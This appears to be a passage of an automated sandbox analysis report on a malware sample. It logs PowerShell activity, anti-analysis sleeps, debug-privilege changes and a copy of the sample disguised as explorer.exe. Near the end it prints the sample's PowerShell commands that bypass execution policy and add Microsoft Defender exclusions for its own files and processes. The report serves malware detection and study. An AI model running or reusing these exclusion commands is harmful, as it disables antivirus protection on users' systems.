            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\explorer.exe  Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Zvas34nq1T.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeMemory allocated: 1440000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeMemory allocated: 1B170000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: BF0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 1A7C0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 7E0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 1A3A0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeWindow / User API: threadDelayed 9496Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5106Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4725Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6895Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2658Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3266Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6364Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7349Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2271Jump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe TID: 2668Thread sleep time: -33204139332677172s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -9223372036854770s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep count: 6895 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep count: 2658 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep count: 3266 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep count: 6364 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3624Thread sleep count: 7349 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800Thread sleep count: 2271 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 7416Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 7436Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\explorer.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Roaming\explorer.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
            Source: Zvas34nq1T.exe, 00000000.00000002.2979655604.000000001C12F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<w%SystemRoot%\system32\mswsock.dlltension type="System.ServiceModel.Channels.ContextBindingElementImporter, System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL"/>
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Zvas34nq1T.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe'
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Zvas34nq1T.exe'
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe; Queries volume information: C:\Users\user\Desktop\Zvas34nq1T.exe VolumeInformation
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe; Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
